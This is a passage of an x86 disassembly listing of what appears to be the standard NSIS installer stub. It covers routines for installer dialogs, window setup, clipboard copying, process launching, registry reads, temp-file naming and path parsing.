call ds:dword_4080F0 ; GlobalLock
mov esi, eax
loc_405548: ; CODE XREF: sub_405202+372�j
lea eax, [ebp+var_3C]
push eax
push ebx
push 102Dh
push [ebp+var_4]
mov [ebp+var_28], esi
mov [ebp+var_24], edi
call ds:dword_408278 ; SendMessageA
push esi
call sub_406003 ; lstrlen
add esi, eax
mov word ptr [esi], 0A0Dh
inc esi
inc esi
inc ebx
cmp ebx, [ebp+arg_0]
jl short loc_405548
push [ebp+arg_4]
call ds:dword_4080EC ; GlobalUnlock
push [ebp+arg_4]
push 1
call ds:dword_4081D0 ; SetClipboardData
call ds:dword_4081CC ; CloseClipboard
loc_405590: ; CODE XREF: sub_405202+199�j
; sub_405202+1B7�j ...
xor eax, eax
jmp loc_405449
sub_405202 endp
; =============== S U B R O U T I N E =======================================
sub_405597 proc near ; DATA XREF: sub_405A5A+224�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 10h
push ebx
push ebp
mov ebp, [esp+18h+arg_4]
mov ecx, 110h
cmp ebp, ecx
push esi
push edi
jz loc_405723
cmp ebp, 408h
jz loc_405723
cmp ebp, 47h
mov ebx, [esp+20h+arg_0]
jnz short loc_4055D9
push 13h
xor eax, eax
push eax
push eax
push eax
push eax
push ebx
push dword_4211D4
call ds:dword_4081FC ; SetWindowPos
loc_4055D9: ; CODE XREF: sub_405597+2B�j
cmp ebp, 5
jnz short loc_4055F6
mov eax, [esp+20h+arg_8]
dec eax
neg eax
sbb eax, eax
and eax, ebp
push eax
push dword_4211D4
call ds:dword_408228 ; ShowWindow
loc_4055F6: ; CODE XREF: sub_405597+45�j
cmp ebp, 40Dh
jnz short loc_405618
push dword_425BA8
call ds:dword_40818C ; DestroyWindow
mov eax, [esp+20h+arg_8]
mov dword_425BA8, eax
jmp loc_405A29
; ---------------------------------------------------------------------------
loc_405618: ; CODE XREF: sub_405597+65�j
cmp ebp, 11h
jnz short loc_405630
push 0
push 0
push ebx
call ds:dword_408244 ; SetWindowLongA
xor eax, eax
inc eax
jmp loc_405A50
; ---------------------------------------------------------------------------
loc_405630: ; CODE XREF: sub_405597+84�j
cmp ebp, 10h
jnz short loc_405668
mov eax, dword_426404
dec eax
cmp dword_40A024, eax
jnz loc_40570F
push dword_4211C8
call ds:dword_4081F8 ; IsWindowEnabled
test eax, eax
jnz loc_40570F
mov ebp, 111h
mov [esp+20h+arg_8], 1
loc_405668: ; CODE XREF: sub_405597+9C�j
cmp ebp, 111h
jnz loc_40570F
movzx esi, word ptr [esp+20h+arg_8]
push esi
push ebx
call ds:dword_408240 ; GetDlgItem
mov ebx, ds:dword_408278
mov edi, eax
test edi, edi
jz short loc_4056A8
push 0
push 0
push 0F3h
push edi
call ebx ; SendMessageA
push edi
call ds:dword_4081F8 ; IsWindowEnabled
test eax, eax
jz loc_405A4E
loc_4056A8: ; CODE XREF: sub_405597+F4�j
xor edi, edi
inc edi
cmp esi, edi
jnz short loc_4056B2
push edi
jmp short loc_4056F3
; ---------------------------------------------------------------------------
loc_4056B2: ; CODE XREF: sub_405597+116�j
cmp esi, 3
jnz short loc_4056C4
cmp dword_40A024, 0
jle short loc_4056FA
push 0FFFFFFFFh
jmp short loc_4056F3
; ---------------------------------------------------------------------------
loc_4056C4: ; CODE XREF: sub_405597+11E�j
cmp esi, 2
jnz short loc_4056FA
cmp dword_42646C, 0
jz short loc_4056E0
push esi
call sub_4014C9
mov dword_4229E0, esi
jmp short loc_4056F1
; ---------------------------------------------------------------------------
loc_4056E0: ; CODE XREF: sub_405597+139�j
push 3
call sub_4014C9
test eax, eax
jnz short loc_40570F
mov dword_4229E0, edi
loc_4056F1: ; CODE XREF: sub_405597+147�j
push 78h
loc_4056F3: ; CODE XREF: sub_405597+119�j
; sub_405597+12B�j
call sub_403F8D
jmp short loc_40570F
; ---------------------------------------------------------------------------
loc_4056FA: ; CODE XREF: sub_405597+127�j
; sub_405597+130�j
push [esp+20h+arg_C]
push [esp+24h+arg_8]
push 111h
push dword_425BA8
call ebx ; SendMessageA
loc_40570F: ; CODE XREF: sub_405597+AA�j
; sub_405597+BE�j ...
push [esp+20h+arg_C]
mov eax, ebp
push [esp+24h+arg_8]
call sub_40403F
jmp loc_405A50
; ---------------------------------------------------------------------------
loc_405723: ; CODE XREF: sub_405597+12�j
; sub_405597+1E�j
cmp ebp, ecx
mov eax, [esp+20h+arg_8]
mov ebx, [esp+20h+arg_0]
mov dword_420DBC, eax
jnz short loc_405781
mov esi, ds:dword_408240
push 1
push ebx
mov dword_4263E0, ebx
call esi ; GetDlgItem
push 2
push ebx
mov dword_4229D8, eax
call esi ; GetDlgItem
push 0FFFFFFFFh
push 1Ch
push ebx
mov dword_4211C8, eax
call sub_403FB4
push dword_425BB0
push 0FFFFFFF2h
push ebx
call ds:dword_4081F4 ; SetClassLongA
push 4
call sub_4014C9
mov dword_425BB4, eax
xor eax, eax
inc eax
mov dword_420DBC, eax
loc_405781: ; CODE XREF: sub_405597+19B�j
mov ecx, dword_40A024
mov esi, ecx
shl esi, 6
add esi, dword_426400
xor edi, edi
cmp ecx, edi
jl short loc_4057D6
cmp eax, 1
jnz short loc_4057CE
push edi
push dword ptr [esi+10h]
call sub_4013E7
test eax, eax
jz short loc_4057CE
push 1
push edi
push 40Fh
push dword_425BA8
call ds:dword_408278 ; SendMessageA
xor eax, eax
cmp dword_425BB4, edi
setz al
jmp loc_405A50
; ---------------------------------------------------------------------------
loc_4057CE: ; CODE XREF: sub_405597+204�j
; sub_405597+211�j
cmp [esi], edi
jz loc_405A4E
loc_4057D6: ; CODE XREF: sub_405597+1FF�j
push 40Bh
call sub_404024
loc_4057E0: ; CODE XREF: sub_405597+386�j
; sub_405597+38E�j ...
mov eax, dword_420DBC
add dword_40A024, eax
shl eax, 6
add esi, eax
mov eax, dword_40A024
cmp eax, dword_426404
jnz short loc_405804
push 1
call sub_4014C9
loc_405804: ; CODE XREF: sub_405597+264�j
cmp dword_425BB4, 0
jnz loc_405A09
mov eax, dword_426404
cmp dword_40A024, eax
jnb loc_405A09
push dword ptr [esi+24h]
mov edi, [esi+14h]
push offset dword_42E000
call sub_4065B7
push dword ptr [esi+20h]
push 0FFFFFC19h
push ebx
call sub_403FB4
push dword ptr [esi+1Ch]
push 0FFFFFC1Bh
push ebx
call sub_403FB4
push dword ptr [esi+28h]
push 0FFFFFC1Ah
push ebx
call sub_403FB4
push 3
push ebx
call ds:dword_408240 ; GetDlgItem
cmp dword_42646C, 0
mov ebp, eax
jz short loc_405879
and edi, 0FFFFFEFDh
or edi, 4
loc_405879: ; CODE XREF: sub_405597+2D7�j
mov eax, edi
and eax, 8
push eax
push ebp
call ds:dword_408228 ; ShowWindow
mov eax, edi
and eax, 100h
push eax
push ebp
call ds:dword_408250 ; EnableWindow
mov eax, edi
and eax, 2
push eax
call sub_403FFA
and edi, 4
push edi
push dword_4211C8
call ds:dword_408250 ; EnableWindow
push 1
xor edi, edi
push edi
push 0F4h
push ebp
mov ebp, ds:dword_408278
call ebp ; SendMessageA
cmp dword_42646C, edi
jz short loc_4058DE
push edi
push 2
push 401h
push ebx
call ebp ; SendMessageA
push dword_4211C8
jmp short loc_4058E4
; ---------------------------------------------------------------------------
loc_4058DE: ; CODE XREF: sub_405597+332�j
push dword_4229D8
loc_4058E4: ; CODE XREF: sub_405597+345�j
call sub_40400D
push offset aNsisError ; "NSIS Error"
mov ebp, offset dword_4219D8
push ebp
call sub_405FFD ; lstrcpy
push dword ptr [esi+18h]
push ebp
call sub_406003 ; lstrlen
add eax, ebp
push eax
call sub_4065B7
push ebp
push ebx
call ds:dword_408184 ; SetWindowTextA
push edi
push dword ptr [esi+8]
call sub_4013E7
test eax, eax
jnz loc_4057E0
cmp [esi], eax
jz loc_4057E0
cmp dword ptr [esi+4], 5
jnz short loc_40594E
cmp dword_42646C, eax
jnz loc_405A4E
cmp dword_426460, eax
jnz loc_4057E0
jmp loc_405A4E
; ---------------------------------------------------------------------------
loc_40594E: ; CODE XREF: sub_405597+398�j
push dword_425BA8
call ds:dword_40818C ; DestroyWindow
cmp dword ptr [esi], 0
mov dword_4229DC, esi
jle loc_405A29
mov eax, [esi+4]
push esi
push off_40A028[eax*4]
mov ax, [esi]
add ax, word ptr dword_425BBC
push ebx
movzx eax, ax
push eax
push dword_4263E4
call ds:dword_408190 ; CreateDialogParamA
test eax, eax
mov dword_425BA8, eax
jz loc_405A29
push dword ptr [esi+2Ch]
push 6
push eax
call sub_403FB4
lea eax, [esp+20h+var_10]
push eax
push 3FAh
push ebx
call ds:dword_408240 ; GetDlgItem
push eax
call ds:dword_4081E0 ; GetWindowRect
lea eax, [esp+20h+var_10]
push eax
push ebx
call ds:dword_4081B8 ; ScreenToClient
push 15h
xor edi, edi
push edi
push edi
push [esp+2Ch+var_C]
push [esp+30h+var_10]
push edi
push dword_425BA8
call ds:dword_4081FC ; SetWindowPos
push edi
push dword ptr [esi+0Ch]
call sub_4013E7
push 8
push dword_425BA8
call ds:dword_408228 ; ShowWindow
push 405h
call sub_404024
jmp short loc_405A29
; ---------------------------------------------------------------------------
loc_405A09: ; CODE XREF: sub_405597+274�j
; sub_405597+285�j
push dword_425BA8
call ds:dword_40818C ; DestroyWindow
push dword_4229E0
and dword_4263E0, 0
push ebx
call ds:dword_4081F0 ; EndDialog
loc_405A29: ; CODE XREF: sub_405597+7C�j
; sub_405597+3CC�j ...
cmp dword_4229E8, 0
jnz short loc_405A4E
cmp dword_425BA8, 0
jz short loc_405A4E
push 0Ah
push ebx
call ds:dword_408228 ; ShowWindow
mov dword_4229E8, 1
loc_405A4E: ; CODE XREF: sub_405597+10B�j
; sub_405597+239�j ...
xor eax, eax
loc_405A50: ; CODE XREF: sub_405597+94�j
; sub_405597+187�j ...
pop edi
pop esi
pop ebp
pop ebx
add esp, 10h
retn 10h
sub_405597 endp
; =============== S U B R O U T I N E =======================================
sub_405A5A proc near ; CODE XREF: start+2AA�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
mov eax, dword_426444
sub esp, 14h
push ebx
push ebp
push esi
mov esi, dword_4263E8
and eax, 20h
push edi
mov dword_426460, eax
call sub_40410B
mov ebp, offset byte_42C400
push ebp
call sub_40622D
xor ebx, ebx
test eax, eax
jnz loc_405B0E
mov ecx, [esi+48h]
cmp ecx, ebx
jz short loc_405B0E
mov eax, dword_426418
mov edx, [esi+4Ch]
mov edi, offset byte_424F80
push edi
add edx, eax
push edx
add ecx, eax
push ecx
push dword ptr [esi+44h]
call sub_405EF1
mov al, byte_424F80
cmp al, bl
jz short loc_405B0E
cmp al, 22h
jnz short loc_405ACD
push 22h
mov edi, offset byte_424F81
push edi
call sub_405DCA
mov [eax], bl
loc_405ACD: ; CODE XREF: sub_405A5A+62�j
push edi
call sub_406003 ; lstrlen
lea eax, [eax+edi-4]
cmp eax, edi
jbe short loc_405B01
push offset a_exe ; ".exe"
push eax
call ds:dword_408080 ; lstrcmpi
test eax, eax
jnz short loc_405B01
push edi
call ds:dword_40808C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_405AFB
test al, 10h
jnz short loc_405B01
loc_405AFB: ; CODE XREF: sub_405A5A+9B�j
push edi
call sub_406207
loc_405B01: ; CODE XREF: sub_405A5A+7F�j
; sub_405A5A+8F�j ...
push edi
call sub_4061A6
push eax
push ebp
call sub_405FFD ; lstrcpy
loc_405B0E: ; CODE XREF: sub_405A5A+2E�j
; sub_405A5A+39�j ...
push ebp
call sub_40622D
test eax, eax
jnz short loc_405B24
push dword ptr [esi+118h]
push ebp
call sub_4065B7
loc_405B24: ; CODE XREF: sub_405A5A+BC�j
xor ebp, ebp
inc ebp
test byte ptr dword_426444, 10h
jz short loc_405B43
cmp dword_426440, ebx
jnz short loc_405B43
call sub_4040E9
mov dword_423F78, ebp
loc_405B43: ; CODE XREF: sub_405A5A+D4�j
; sub_405A5A+DC�j
push 8040h
push ebx
push ebx
push ebp
push 67h
push dword_4263E4
call ds:dword_408248 ; LoadImageA
mov dword_425BB0, eax
cmp dword ptr [esi+50h], 0FFFFFFFFh
mov edi, offset dword_425B80
jz loc_405BF6
mov ecx, dword_4263E4
mov dword_425B94, eax
lea eax, [esp+24h+var_14]
push edi
mov [esp+28h+var_14], 624E5Fh
mov dword_425B84, offset sub_401000
mov dword_425B90, ecx
mov dword_425BA4, eax
call ds:dword_408210 ; RegisterClassA
test ax, ax
jz loc_405CCC
push ebx
lea eax, [esp+28h+var_10]
push eax
push ebx
push 30h
call ds:dword_40820C ; SystemParametersInfoA
mov eax, [esp+24h+var_4]
sub eax, [esp+24h+var_C]
push ebx
push dword_4263E4
push ebx
push ebx
push eax
mov eax, [esp+38h+var_8]
sub eax, [esp+38h+var_10]
push eax
push [esp+3Ch+var_C]
lea eax, [esp+40h+var_14]
push [esp+40h+var_10]
push 80000000h
push ebx
push eax
push 80h
call ds:dword_408208 ; CreateWindowExA
mov dword_4211D4, eax
loc_405BF6: ; CODE XREF: sub_405A5A+10D�j
push ebx
call sub_4014C9
test eax, eax
jz short loc_405C08
loc_405C00: ; CODE XREF: sub_405A5A+25A�j
; sub_405A5A+267�j
push 2
pop eax
jmp loc_405CCE
; ---------------------------------------------------------------------------
loc_405C08: ; CODE XREF: sub_405A5A+1A4�j
call sub_40410B
cmp dword_426480, ebx
jnz loc_405CA4
push 5
push dword_4211D4
call ds:dword_408228 ; ShowWindow
mov esi, ds:dword_4080C0
mov ebp, offset aRiched20_dll ; "RichEd20.dll"
push ebp
call esi ; LoadLibraryA
test eax, eax
jnz short loc_405C45
push ebp
mov word ptr aRiched20_dll+6, 3233h
call esi ; LoadLibraryA
loc_405C45: ; CODE XREF: sub_405A5A+1DD�j
mov ebp, ds:dword_408204
push edi
mov esi, offset aRichedit20a ; "RichEdit20A"
push esi
push ebx
call ebp ; GetClassInfoA
test eax, eax
jnz short loc_405C78
push edi
push esi
push ebx
mov byte ptr aRichedit20a+8, bl
call ebp ; GetClassInfoA
push edi
mov dword_425BA4, esi
mov byte ptr aRichedit20a+8, 32h
call ds:dword_408210 ; RegisterClassA
loc_405C78: ; CODE XREF: sub_405A5A+1FD�j
mov eax, dword_425BBC
push ebx
push offset sub_405597
add eax, 69h
movzx eax, ax
push ebx
push eax
push dword_4263E4
call ds:dword_408200 ; DialogBoxParamA
push 5
mov esi, eax
call sub_4014C9
mov eax, esi
jmp short loc_405CCE
; ---------------------------------------------------------------------------
loc_405CA4: ; CODE XREF: sub_405A5A+1B9�j
push ebx
call sub_405177
test eax, eax
jz short loc_405CC6
cmp dword_425BB4, ebx
jnz loc_405C00
push 2
call sub_4014C9
jmp loc_405C00
; ---------------------------------------------------------------------------
loc_405CC6: ; CODE XREF: sub_405A5A+252�j
push ebp
call sub_4014C9
loc_405CCC: ; CODE XREF: sub_405A5A+149�j
xor eax, eax
loc_405CCE: ; CODE XREF: sub_405A5A+1A9�j
; sub_405A5A+248�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 14h
retn
sub_405A5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405CD6 proc near ; CODE XREF: sub_40463C+166�p
; sub_4065B7+16C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
call ds:dword_40816C
mov eax, [ebp+var_4]
test eax, eax
jz short locret_405CFD
push [ebp+arg_0]
mov ecx, [eax]
push eax
call dword ptr [ecx+14h]
mov eax, [ebp+var_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
locret_405CFD: ; CODE XREF: sub_405CD6+13�j
leave
retn 4
sub_405CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405D01 proc near ; CODE XREF: sub_401610+D22�p
; sub_401610+19B8�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
mov dword_4231F0, 44h
call ds:dword_40808C ; GetFileAttributesA
xor ecx, ecx
cmp eax, 0FFFFFFFFh
jz short loc_405D25
test al, 10h
jnz short loc_405D28
loc_405D25: ; CODE XREF: sub_405D01+1E�j
mov [ebp+arg_4], ecx
loc_405D28: ; CODE XREF: sub_405D01+22�j
lea eax, [ebp+var_10]
push eax
push offset dword_4231F0
push [ebp+arg_4]
push ecx
push ecx
push ecx
push ecx
push ecx
push [ebp+arg_0]
push ecx
call ds:dword_4080FC ; CreateProcessA
test eax, eax
jz short locret_405D53
push [ebp+var_C]
call ds:dword_408084 ; CloseHandle
mov eax, [ebp+var_10]
locret_405D53: ; CODE XREF: sub_405D01+44�j
leave
retn 8
sub_405D01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405D57 proc near ; CODE XREF: .text:004033A3�p
; sub_403FB4+1A�p ...
jmp ds:dword_408214
sub_405D57 endp
; =============== S U B R O U T I N E =======================================
sub_405D5D proc near ; CODE XREF: sub_4041F2+18�p
; sub_40463C+33�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 400h
push [esp+4+arg_4]
push [esp+8+arg_0]
push dword_425BA8
call ds:dword_408218 ; GetDlgItemTextA
retn 8
sub_405D5D endp
; =============== S U B R O U T I N E =======================================
sub_405D79 proc near ; CODE XREF: sub_401610+611�p
; sub_401610:loc_401D29�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, eax
and ecx, 1FFFFFh
cmp dword_426480, 0
jz short loc_405D93
shr eax, 15h
jnz short locret_405DB8
loc_405D93: ; CODE XREF: sub_405D79+13�j
cmp dword_426488, 0
jz short loc_405DA2
xor ecx, 180000h
loc_405DA2: ; CODE XREF: sub_405D79+21�j
push ecx
push offset aNsisError ; "NSIS Error"
push [esp+8+arg_0]
push dword_4263E0
call ds:dword_40821C ; MessageBoxA
locret_405DB8: ; CODE XREF: sub_405D79+18�j
retn 8
sub_405D79 endp
; =============== S U B R O U T I N E =======================================
sub_405DBB proc near ; CODE XREF: sub_401610+4A0�p
; sub_401610+A0E�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 40h
call ds:dword_4080F4 ; GlobalAlloc
retn 4
sub_405DBB endp
; =============== S U B R O U T I N E =======================================
sub_405DCA proc near ; CODE XREF: start+BA�p start+17C�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, [esp+arg_0]
jmp short loc_405DDD
; ---------------------------------------------------------------------------
loc_405DD0: ; CODE XREF: sub_405DCA+17�j
cmp cl, [esp+arg_4]
jz short locret_405DE3
push eax
call ds:dword_408198 ; CharNextA
loc_405DDD: ; CODE XREF: sub_405DCA+4�j
mov cl, [eax]
test cl, cl
jnz short loc_405DD0
locret_405DE3: ; CODE XREF: sub_405DCA+A�j
retn 8
sub_405DCA endp
; =============== S U B R O U T I N E =======================================
sub_405DE6 proc near ; CODE XREF: sub_401610+51C�p
; sub_401610+102F�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
mov al, [ecx]
or al, 20h
cmp word ptr [ecx], 5C5Ch
jz short loc_405E07
cmp al, 61h
jl short loc_405E03
cmp al, 7Ah
jg short loc_405E03
cmp byte ptr [ecx+1], 3Ah
jz short loc_405E07
loc_405E03: ; CODE XREF: sub_405DE6+11�j
; sub_405DE6+15�j
xor eax, eax
jmp short locret_405E0A
; ---------------------------------------------------------------------------
loc_405E07: ; CODE XREF: sub_405DE6+D�j
; sub_405DE6+1B�j
xor eax, eax
inc eax
locret_405E0A: ; CODE XREF: sub_405DE6+1F�j
retn 4
sub_405DE6 endp
; =============== S U B R O U T I N E =======================================
sub_405E0D proc near ; CODE XREF: sub_40463C+A4�p
; sub_40463C+1F7�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, ds:dword_408198
push edi
mov edi, [esp+0Ch+arg_0]
push edi
call esi ; CharNextA
mov ebx, eax
push ebx
call esi ; CharNextA
cmp byte ptr [edi], 0
jz short loc_405E33
cmp word ptr [ebx], 5C3Ah
jnz short loc_405E33
push eax
call esi ; CharNextA
jmp short loc_405E54
; ---------------------------------------------------------------------------
loc_405E33: ; CODE XREF: sub_405E0D+18�j
; sub_405E0D+1F�j
cmp word ptr [edi], 5C5Ch
jnz short loc_405E52
push 2
pop esi
loc_405E3D: ; CODE XREF: sub_405E0D+41�j
push 5Ch
push eax
dec esi
call sub_405DCA
cmp byte ptr [eax], 0
jz short loc_405E52
inc eax
test esi, esi
jnz short loc_405E3D
jmp short loc_405E54
; ---------------------------------------------------------------------------
loc_405E52: ; CODE XREF: sub_405E0D+2B�j
; sub_405E0D+3C�j
xor eax, eax
loc_405E54: ; CODE XREF: sub_405E0D+24�j
; sub_405E0D+43�j
pop edi
pop esi
pop ebx
retn 4
sub_405E0D endp
; =============== S U B R O U T I N E =======================================
sub_405E5A proc near ; CODE XREF: sub_401610+1901�p
; sub_403756+BE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_8]
test esi, esi
jle short loc_405E76
mov eax, [esp+4+arg_4]
sub eax, ecx
loc_405E6D: ; CODE XREF: sub_405E5A+1A�j
mov dl, [eax+ecx]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_405E6D
loc_405E76: ; CODE XREF: sub_405E5A+B�j
pop esi
retn 0Ch
sub_405E5A endp
; =============== S U B R O U T I N E =======================================
sub_405E7A proc near ; CODE XREF: sub_401610+5BB�p
; sub_401610+15B7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_0]
call ds:dword_40808C ; GetFileAttributesA
mov ecx, eax
inc ecx
push 0
neg ecx
sbb ecx, ecx
and ecx, eax
push ecx
push [esp+8+arg_8]
push 0
push 1
push [esp+14h+arg_4]
push [esp+18h+arg_0]
call ds:dword_4080B8 ; CreateFileA
retn 0Ch
sub_405E7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405EA9 proc near ; CODE XREF: sub_401610+423�p
; sub_403756+1F8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
push 64h
pop edi
loc_405EB4: ; CODE XREF: sub_405EA9+39�j
dec edi
mov [ebp+arg_0], 61736Eh
call ds:dword_4080B4 ; GetTickCount
push 1Ah
pop ecx
xor edx, edx
div ecx
push esi
push 0
lea eax, [ebp+arg_0]
push eax
push [ebp+arg_4]
add byte ptr [ebp+arg_0+2], dl
call ds:dword_408100 ; GetTempFileNameA
test eax, eax
jnz short loc_405EED
test edi, edi
jnz short loc_405EB4
mov byte ptr [esi], 0
loc_405EE7: ; CODE XREF: sub_405EA9+46�j
pop edi
pop esi
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_405EED: ; CODE XREF: sub_405EA9+35�j
mov eax, esi
jmp short loc_405EE7
sub_405EA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405EF1 proc near ; CODE XREF: sub_405A5A+52�p
; sub_4065B7+D9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_C]
lea eax, [ebp+arg_4]
push eax
push 20019h
xor ebx, ebx
push ebx
push [ebp+arg_4]
mov [esi], bl
push [ebp+arg_0]
call ds:dword_408008 ; RegOpenKeyExA
test eax, eax
jnz short loc_405F55
lea eax, [ebp+arg_0]
push eax
push esi
lea eax, [ebp+arg_C]
push eax
push ebx
push [ebp+arg_8]
mov [ebp+arg_0], 400h
push [ebp+arg_4]
call ds:dword_40801C ; RegQueryValueExA
test eax, eax
jnz short loc_405F44
cmp [ebp+arg_C], 1
jz short loc_405F46
cmp [ebp+arg_C], 2
jz short loc_405F46
loc_405F44: ; CODE XREF: sub_405EF1+45�j
mov [esi], bl
loc_405F46: ; CODE XREF: sub_405EF1+4B�j
; sub_405EF1+51�j
push [ebp+arg_4]
mov [esi+3FFh], bl
call ds:dword_408020 ; RegCloseKey
loc_405F55: ; CODE XREF: sub_405EF1+24�j
pop esi
pop ebx
pop ebp
retn 10h
sub_405EF1 endp
; =============== S U B R O U T I N E =======================================
sub_405F5B proc near ; CODE XREF: sub_401610+DA3�p
; sub_401610+DE8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push offset aD ; "%d"
push [esp+8+arg_0]
call ds:dword_408230 ; wsprintfA
add esp, 0Ch
retn 8
sub_405F5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F74 proc near ; CODE XREF: sub_4013E7+6F�p
; sub_4014F2+10�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
xor edi, edi
cmp byte ptr [ecx], 2Dh
mov [ebp+var_4], 1
mov al, 0Ah
mov bl, 39h
jnz short loc_405F95
inc ecx
or [ebp+var_4], 0FFFFFFFFh
loc_405F95: ; CODE XREF: sub_405F74+1A�j
cmp byte ptr [ecx], 30h
jnz short loc_405FB6
inc ecx
mov dl, [ecx]
cmp dl, 30h
jl short loc_405FAB
cmp dl, 37h
jg short loc_405FAB
mov al, 8
mov bl, 37h
loc_405FAB: ; CODE XREF: sub_405F74+2C�j
; sub_405F74+31�j
and dl, 0DFh
cmp dl, 58h
jnz short loc_405FB6
mov al, 10h
inc ecx
loc_405FB6: ; CODE XREF: sub_405F74+24�j
; sub_405F74+3D�j ...
movsx edx, byte ptr [ecx]
inc ecx
cmp edx, 30h
jl short loc_405FCB
movsx esi, bl
cmp edx, esi
jg short loc_405FCB
sub edx, 30h
jmp short loc_405FE4
; ---------------------------------------------------------------------------
loc_405FCB: ; CODE XREF: sub_405F74+49�j
; sub_405F74+50�j
cmp al, 10h
jnz short loc_405FF0
mov esi, edx
and esi, 0FFFFFFDFh
cmp esi, 41h
jl short loc_405FF0
cmp esi, 46h
jg short loc_405FF0
and edx, 7
add edx, 9
loc_405FE4: ; CODE XREF: sub_405F74+55�j
movsx esi, al
imul esi, edi
add esi, edx
mov edi, esi
jmp short loc_405FB6
; ---------------------------------------------------------------------------
loc_405FF0: ; CODE XREF: sub_405F74+59�j
; sub_405F74+63�j ...
mov eax, [ebp+var_4]
imul eax, edi
pop edi
pop esi
pop ebx
leave
retn 4
sub_405F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405FFD proc near ; CODE XREF: sub_401610+276�p
; sub_401610+2EE�p ...
jmp ds:dword_408104
sub_405FFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_406003 proc near ; CODE XREF: sub_401610+2F4�p
; sub_401610+2FE�p ...
jmp ds:dword_408108
sub_406003 endp
; =============== S U B R O U T I N E =======================================
sub_406009 proc near ; CODE XREF: sub_401508+2F�p
; sub_401610+54C�p ...
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, ds:dword_408198
push esi
mov esi, [esp+0Ch+arg_0]
push edi
jmp short loc_40601E
; ---------------------------------------------------------------------------
loc_406019: ; CODE XREF: sub_406009+18�j
push esi
call ebp ; CharNextA
mov esi, eax
loc_40601E: ; CODE XREF: sub_406009+E�j
cmp byte ptr [esi], 20h
jz short loc_406019
cmp byte ptr [esi], 5Ch
jnz short loc_40603D
cmp byte ptr [esi+1], 5Ch
jnz short loc_40603D
cmp byte ptr [esi+2], 3Fh
jnz short loc_40603D
cmp byte ptr [esi+3], 5Ch
jnz short loc_40603D
add esi, 4
loc_40603D: ; CODE XREF: sub_406009+1D�j
; sub_406009+23�j ...
cmp byte ptr [esi], 0
jz short loc_40604E
push esi
call sub_405DE6
test eax, eax
jz short loc_40604E
inc esi
inc esi
loc_40604E: ; CODE XREF: sub_406009+37�j
; sub_406009+41�j
mov ebx, esi
mov edi, esi
xor eax, eax
jmp short loc_406081
; ---------------------------------------------------------------------------
loc_406056: ; CODE XREF: sub_406009+7C�j
cmp al, 1Fh
jbe short loc_40607C
push eax
push offset a? ; "*?|<>/\":"
call sub_405DCA
cmp byte ptr [eax], 0
jnz short loc_40607C
push esi
call ebp ; CharNextA
sub eax, esi
push eax
push esi
push edi
call sub_405E5A
push edi
call ebp ; CharNextA
mov edi, eax
loc_40607C: ; CODE XREF: sub_406009+4F�j
; sub_406009+5F�j
push esi
call ebp ; CharNextA
mov esi, eax
loc_406081: ; CODE XREF: sub_406009+4B�j
mov al, [esi]
test al, al
jnz short loc_406056
mov [edi], al
loc_406089: ; CODE XREF: sub_406009+99�j
push edi
push ebx
call ds:dword_40822C ; CharPrevA
mov edi, eax
mov al, [edi]
cmp al, 20h
jz short loc_40609D
cmp al, 5Ch
jnz short loc_4060A4
loc_40609D: ; CODE XREF: sub_406009+8E�j
cmp ebx, edi
mov byte ptr [edi], 0
jb short loc_406089
loc_4060A4: ; CODE XREF: sub_406009+92�j
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
retn 4
sub_406009 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4060AD proc near ; CODE XREF: start+2B5�p sub_40614C+16�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_0], ebx
jz short loc_4060D2
mov eax, dword_40A060
cmp eax, 0FFFFFFFFh
jz short loc_4060C9
push eax
